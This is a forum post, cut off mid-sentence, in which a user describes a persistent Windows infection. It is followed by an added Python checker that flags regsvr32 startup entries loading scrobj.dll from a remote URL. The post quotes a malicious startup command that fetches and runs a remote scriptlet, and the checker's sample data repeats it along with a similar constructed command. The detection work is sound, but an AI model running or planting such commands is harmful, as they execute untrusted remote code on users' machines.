I've been having fun for days wrestling with this, myself. I still don't think I've got it all.
First, and most importantly, before any reboot (even in Safe Mode), check MSCONFIG. In the StartUp tab, it keeps adding this:
regsvr32 /u /s /i:http://js.1226bye.xyz:280/v.sct scrobj.dll
The URL doesn't actually work, but I don't think that's the point.
My theory is that this is actually a combination of viruses (in the general sense of the word, including worms, malware, rootkits, bootsector viruses, etc.). My further theory is that they all work together to keep each other activate
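
Added example, not part of the original post: a small Python check that flags startup command lines of the kind quoted above, where regsvr32 is pointed at scrobj.dll with a remote `/i:` URL. The entry names and every sample command line except the one from the post are constructed, and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit

# Constructed startup entries (name -> command line). Only the "start" command
# line comes from the post; names and the other entries are made up.
SAMPLE_STARTUP = {
    "OneDrive": r'"C:\Program Files\Microsoft OneDrive\OneDrive.exe" /background',
    "ocx-cleanup": r"regsvr32 /u /s C:\Tools\legacy.ocx",
    "start": "regsvr32 /u /s /i:http://js.1226bye.xyz:280/v.sct scrobj.dll",
    "start2": r'"C:\Windows\System32\RegSvr32.EXE" -s -u -i:"HTTP://example.invalid/a.sct" ScrObj.dll',
}

def _basename(arg):
    """Lower-cased file name without directory, for either slash style."""
    return re.split(r"[\\/]", arg)[-1].lower()

def remote_scriptlet(cmdline):
    """Return (url, host, port) when regsvr32 is told to load scrobj.dll with a
    remote /i: URL; otherwise None."""
    # Keep quoted paths with spaces together, then drop the quotes.
    args = [a.replace('"', "") for a in re.findall(r'"[^"]*"\S*|\S+', cmdline)]
    if not args or _basename(args[0]) not in ("regsvr32", "regsvr32.exe"):
        return None
    if not any(_basename(a) in ("scrobj", "scrobj.dll") for a in args[1:]):
        return None
    for arg in args[1:]:
        m = re.match(r"^[/-]i:(.+)$", arg, re.IGNORECASE)
        if not m:
            continue
        try:
            parts = urlsplit(m.group(1))
            port = parts.port          # raises ValueError on a malformed port
        except ValueError:
            continue
        if parts.scheme in ("http", "https") and parts.hostname:
            return (m.group(1), parts.hostname, port)
    return None

def scan_startup(entries):
    """List (name, url, host, port) for every entry that matches."""
    hits = []
    for name, cmdline in entries.items():
        found = remote_scriptlet(cmdline)
        if found:
            hits.append((name,) + found)
    return hits

if __name__ == "__main__":
    for hit in scan_startup(SAMPLE_STARTUP):
        print(hit)
```

The check only covers regsvr32 invoked directly as the first token; an entry that wraps it in another launcher would need that wrapper peeled off first.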